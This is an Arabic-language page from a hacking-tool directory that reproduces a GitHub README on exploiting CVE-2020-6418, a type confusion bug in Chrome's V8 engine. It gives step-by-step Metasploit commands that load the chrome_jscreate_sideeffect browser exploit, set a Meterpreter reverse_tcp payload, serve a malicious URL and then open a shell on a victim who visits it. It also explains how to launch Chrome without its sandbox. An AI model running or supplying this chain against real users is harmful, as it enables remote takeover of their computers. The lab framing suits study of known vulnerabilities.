Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-6418 | Kitploit
أدوات/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
أطر الاستغلالتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-6418

تتعلق الثغرة CVE-2020-6418 بالخلط في النوع (type confusion) في V8 في متصفح Google Chrome. الإصدارات المتأثرة هي تلك التي تسبق الإصدار 80.0.3987.122. يتم تحقيق الثغرة عن طريق مهاجم عن بعد يصل إلى شل (shell) جهاز الهدف عبر صفحة HTML مصممة خصيصًا.

متطلبات البيئة

  1. متصفح Google Chrome بإصدار أقدم من 80.0.3987.122 .
root@kitploit:~
ملاحظة: يجب تشغيل متصفح Google Chrome بدون صندوق رمل (sandbox) لكي ينجح الاستغلال.
  1. إطار عمل Metasploit
  2. نظام التشغيل: أي نظام

إعداد الاستغلال

  1. إصدار Google Chrome v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

إعداد Google Chrome بدون صندوق رمل

i) إنشاء اختصار لـ Google Chrome
ii) النقر على "خصائص" > الانتقال إلى خيار يسمى "الهدف" (Target)
iii) في نهاية المسار EXE، أضف مسافة ثم أدخل -no-sandbox
iv) انقر "تطبيق" > "موافق"
v) افتح متصفح Google Chrome الجديد وستظهر نافذة منبثقة بالنص التالي:

root@kitploit:~
You are using an unsupported command-line flag: -no-sandbox. Stability and security will suffer

توضيح تعطيل صندوق الرمل

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

استخدام Metasploit

نظرًا لأننا نستخدم Kali كبيئة لتنفيذ الاستغلال، فإن metasploit يأتي كأداة مدمجة مع التوزيعة. ولكن إذا كنت تستخدم توزيعات أخرى، فسنحتاج إلى إعداد metasploit قبل بدء الاستغلال.

ارجع إلى تثبيت Metasploit لمزيد من الفهم.

تنفيذ الاستغلال

i) بدء إطار عمل metasploit

root@kitploit:~
> msfconsole

ii) البحث عن الاستغلال

root@kitploit:~
> search chrome_js

iii) استخدام الاستغلال المتاح من الإخراج أعلاه

root@kitploit:~
> use exploit/multi/browser/chrome_jscreate_sideeffect

iv) توفير عنوان IP لـ SRVHOST

root@kitploit:~
> set SRVHOST <ip address>

v) توفير الهدف هنا نحصل على خيارين

  1. الهدف 0: لنظام Windows
  2. الهدف 1: لنظام MAC
root@kitploit:~
> set Target " Number "

vi) توفير الحمولة (Payload)

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) للتحقق من الإعدادات والخيارات الحالية الممكنة

root@kitploit:~
> show options

viii) لتشغيل الاستغلال

root@kitploit:~
> run (or) > exploit

ix) سيتم تزويدك بعنوان URL، يجب نسخه في المتصفح لتفعيل الجلسة.

x) بمجرد وصول المستخدم إلى URL، سيتم إنشاء جلسة. للتحقق من ذلك:

root@kitploit:~
> show sessions

xi) باستخدام الجلسة، يمكننا التحقق من معلومات نظام المستخدم / الدخول إلى الشل.

root@kitploit:~
> sessions <number>
> shell

توضيح الاستغلال

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

تنزيل الأداة